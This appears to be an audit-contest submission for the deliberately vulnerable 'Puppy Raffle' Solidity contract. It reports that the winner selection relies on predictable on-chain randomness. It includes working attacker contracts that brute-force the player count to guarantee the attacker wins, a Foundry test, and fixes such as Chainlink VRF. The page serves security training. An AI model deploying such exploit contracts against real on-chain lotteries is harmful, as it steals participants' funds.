Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Predictable on-chain randomness allows winner manipulation in `selectWinner`

mathcelo

The winner index in selectWinner (L152-156) is computed from values that are fully observable or controllable on-chain:

uint256 winnerIndex = uint256(
keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))
) % players.length;

  • msg.sender: The attacker chooses which address calls the function.

  • block.timestamp: Known before transaction inclusion; manipulable by validators within protocol bounds.

  • block.difficulty: Deterministic before block finalization. Post-Merge, this opcode returns prevrandao, which is known to the block proposer.

  • players.length: Publicly readable.

An attacker can precompute the hash output for any combination of inputs. By adding dummy players to manipulate players.length, the attacker controls the modulo divisor until winnerIndex resolves to their own index.

Exploit Scenario

  1. The attacker enters the raffle at index 0 using a contract address.

  2. Three legitimate players enter (4 total required).

  3. After the raffle duration elapses, the attacker simulates keccak256(address(this), block.timestamp, block.difficulty) % players.length off-chain.

  4. If the result does not point to index 0, the attacker adds dummy players (incrementing players.length) and recalculates.

  5. Once the modulo yields index 0, the attacker calls selectWinner and is guaranteed to win the prize pool.

Proof of Concept

Attacker contract:

contract SelectWinnerAttacker {
PuppyRaffle immutable victim;
uint256 immutable entranceFee;
constructor(PuppyRaffle _victim) {
victim = _victim;
entranceFee = _victim.entranceFee();
}
function attack(uint256 currentPlayerCount) external {
uint256 targetIndex = 0;
uint256 currentLen = currentPlayerCount;
while (true) {
uint256 winnerIndex = uint256(
keccak256(
abi.encodePacked(
address(this),
block.timestamp,
block.difficulty
)
)
) % currentLen;
if (winnerIndex == targetIndex) {
break;
}
// Add one more dummy player to change players.length
address[] memory dummies = new address[](1);
dummies[0] = address(uint160(currentLen + 100));
victim.enterRaffle{value: entranceFee}(dummies);
currentLen++;
}
victim.selectWinner();
}
function onERC721Received(
address, address, uint256, bytes memory
) external pure returns (bytes4) {
return this.onERC721Received.selector;
}
receive() external payable {}
}

Test:

function test_attackerCanPredictWinner() public {
// Attacker enters as the first player
SelectWinnerAttacker attacker = new SelectWinnerAttacker(puppyRaffle);
address[] memory firstBatch = new address[](1);
firstBatch[0] = address(attacker);
puppyRaffle.enterRaffle{value: entranceFee}(firstBatch);
// 3 more legitimate players enter (need >= 4 total)
address[] memory legit = new address[](3);
legit[0] = playerTwo;
legit[1] = playerThree;
legit[2] = playerFour;
puppyRaffle.enterRaffle{value: entranceFee * 3}(legit);
// Warp past raffle duration
vm.warp(block.timestamp + duration + 1);
// Fund attacker so it can pay for dummy entries
vm.deal(address(attacker), entranceFee * 100);
// Attacker brute-forces players.length until the winner
// index lands on itself, then calls selectWinner
attacker.attack(4);
// Attacker guaranteed itself as the winner
assertEq(puppyRaffle.previousWinner(), address(attacker));
}

Recommendations

Short term: Use a commit-reveal scheme to separate the randomness contribution from the winner selection, preventing front-running.

Long term: Use a verifiable random function oracle (e.g., Chainlink VRF) to provide tamper-proof randomness that neither miners, validators, nor participants can influence.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 4 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!